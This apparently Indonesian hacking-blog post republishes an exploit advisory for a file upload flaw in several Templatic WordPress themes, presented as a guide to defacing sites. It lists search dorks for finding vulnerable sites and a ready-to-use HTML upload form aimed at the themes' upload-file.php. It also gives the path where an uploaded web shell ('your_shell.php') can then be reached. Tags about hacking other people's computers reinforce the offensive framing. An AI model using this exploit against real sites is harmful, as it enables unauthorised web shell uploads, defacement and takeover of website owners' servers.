Deface Menggunakan Wordpress Templatic Themes CSRF File Upload Vulnerability

#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]
#Author : Jje Incovers
#Date : 31/03/2014
#Category : Web Applications
#Type : PHP
#Vendor : http://templatic.com/
#Download : http://templatic.com/wordpress-themes-store/
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF

#Dork :
inurl:/wp-content/themes/Realestate/
inurl:/wp-content/themes/dailydeal/
inurl:/wp-content/themes/nightlife/
inurl:/wp-content/themes/5star/
inurl:/wp-content/themes/specialist/

CSRF File Upload Vulnerability

Exploit & POC : http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php

<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
">

<br>
</br>
<input name="uploadfile[]" type="file" />

<br>
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>

File Access :
http://site-target/wp-content/themes/Realestate/images/tmp/your_shell.php

Note :
Script CSRF equate with dork you use

########################################
#Greetz : SANJUNGAN JIWA , All Indonesian H4xor
#Thanks : All member SANJUNGAN JIWA , Co-p1r3 , Jje Incovers , MrTieDie , Ice-Cream ,
########################################

Tags : Cara untuk Meretas sebuah Komputer,trick Hack Komputer Super Jail,Cara Mematikan Komputer Orang Lain,Cara Mengendalikan Komputer Jarak Jauh,Cara Meretas Komputer Orang Lain,Cara Hack Komputer Orang Lain,Cara Meretas Komputer Orang dari Jarak Jauh,Cara memantau Komputer lain dengan Command Prompt,Cara hack komputer remote menggunakan IP,Trik Hack Komputer yang Sangat Berbahaya,Dasar-dasar Meretas,Dasar-dasar Hack,

Share this article please, on :

Share on fb Tweet Share on G+